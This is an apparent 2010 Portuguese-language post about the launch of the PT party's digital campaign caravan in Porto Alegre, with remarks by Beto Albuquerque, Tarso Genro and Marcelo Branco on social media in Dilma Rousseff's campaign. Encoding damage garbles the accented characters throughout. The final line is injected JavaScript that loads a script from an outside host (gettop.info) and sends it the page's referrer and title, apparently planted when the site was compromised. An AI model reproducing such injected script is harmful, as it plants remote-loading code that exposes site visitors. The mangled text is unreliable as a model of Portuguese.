Beto participa de abertura da Caravana Digital do PT no RS

Jul 17 2010
(0) Comments

A utilizaA�A?o das mA�dias sociais como ferramenta importante na campanha eleitoral foi unanimidade na abertura, na noite desta sexta-feira (16), da Caravana Digital do PT em Porto Alegre. O deputado federal Beto Albuquerque (PSB), usuA?rio assA�duo de redes sociais como twitter, afirmou que o grande ganho desta nova modalidade de campanha A� o fim da intermediaA�A?o entre o candidato e seus eleitores. “O que dizemos aqui A� imediatamente acompanhado por nossos seguidores-eleitores sem nenhuma forma de interferA?ncia. O que dizemos A� informado em tempo real e com fidelidade”, afirmou o socialista que participou do evento ao lado do candidato do PT a govenador do RS, Tarso Genro.

Em sua fala, Beto anunciou que acabara de saber apA?s telefonema de sua esposa, Daniela, que serA? pai mais uma vez. Enquanto era aplaudido a informaA�A?o era rapidamenta divulgada pelas redes sociais dosparticipantes.

Enquanto o guru da informaA�A?o digital e criador do Softwere Livre Brasil Marcelo Branco apresentava a campanha digital da candidatado PTA� a presidente da RepA?blica, Dilma Rousseff, dezenas de participantes do encontro “twitavam” o que ouviam e comentavam a largada da Caravana Digital em suas redes sociais.

A caravana, que tem como objetivo mobilizar militantes do partido atravA�s de ambientes como Orkut e Twitter, jA? passou por 22 capitais.Branco A� um dos personagens centrais desta sA�rie de eventos A� o estrategista da campanha em mA�dias digitais de Dilma. Dono de uma postura irreverente dentro e fora da rede, Branco A� um ativista da ampla utilizaA�A?o de plataformas de UGC como forma de contato entre candidatos e eleitores.

Tarso , que abriu o encontro, disse que A� preciso cavar novos espaA�os de divulgaA�A?o da nossa informaA�A?o, o que aponta para a grande importA?ncia das redes sociais.

Como exemplo da eficA?cia e rapidez das mA�dias digitais, Marcelo Branco apresentou no telA?o o clip Dilma Boy, novo hit da campanha da petista. ParA?dia feita por um usuA?rio de uma mA?sica da estrela pop americana Lady Gaga, o Dilma Boy popularizou o bordA?o a�?Ela A� amiga do homema�?, se referindo a Lula.

Os olhos de Branco brilham como os de um pai coruja quando fala do vA�deo: a�?Os apoiadores da campanha passaram a ser um elemento importante na formaA�A?o de opiniA?o. Eles tA?m a possibilidade de construir os prA?prios conteA?dos, com sua prA?pria voz, com seu prA?prio texto, sua prA?pria imagem. NA?s tivemos o exemplo, nessa semana, do Dilma Boy, um vA�deo produzido de forma independente por um garoto de 25 anos do interior de GoiA?s e que hoje A� o a�?webhita�� da internet brasileira. Certamente isso mostra que os apoiadores sabem dar uma linha para campanha e nA?s estamos atentos a issoa�?.

Questionado sobre a dificuldade de Dilma estar presente em todos os espaA�os a que se propA?s, como o Orkut, Branco afirma que o objetivo da campanha nas mA�dias sociais nunca foi centralizar na figura da candidata as aA�A�es na rede. Para ele, o objetivo seria utilizar os espaA�os jA? criados pelos prA?prios usuA?rios.

Ainda que parte da imprensa gaA?cha estivesse presente para cobrir o evento e que um caminhA?o estacionado em frente ao local transmitisse o encontro pela web, os participantes ocuparam-se em reportar o que acontecia lA? dentro atravA�s de notebooks, celulares e outros dispositivos mA?veis conectados.

Assessoria de Imprensa do deputado com Portal Terra


Beto, Tarso e Marcelo Branco em meio aos participantes da Caravana Digital



s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;